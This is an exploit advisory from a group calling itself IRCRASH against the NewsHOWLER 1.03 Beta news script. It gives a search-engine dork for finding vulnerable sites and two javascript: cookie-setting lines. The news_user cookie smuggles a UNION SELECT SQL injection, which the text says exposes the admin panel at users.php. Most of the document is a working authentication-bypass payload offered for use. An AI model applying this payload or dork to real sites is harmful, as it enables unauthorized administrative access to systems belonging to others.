|
|
#####################################################################################=0D
#### NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection ####=0D
#####################################################################################=0D
# #=0D
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #=0D
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #=0D
#Our Site : Http://IRCRASH.COM #=0D
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #=0D
#####################################################################################=0D
# #=0D
#Download : http://garr.dl.sourceforge.net/sourceforge/newshowler/NewsHOWLER-1.03-Beta.tgz=0D
# #=0D
#DORK : "Net Dupe =A9 2002. All Rights Reserved" #=0D
# #=0D
#####################################################################################=0D
# [Exploit] #=0D
# #=0D
#javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";=0D
#javascript:document.cookie = "news_password=3; path=/"; #=0D
# #=0D
#Then if u open http://Site/users.php u can see the admin panel ;) #=0D
# #=0D
#####################################################################################=0D
# Site : Http://IRCRASH.COM #=0D
###################################### TNX GOD ######################################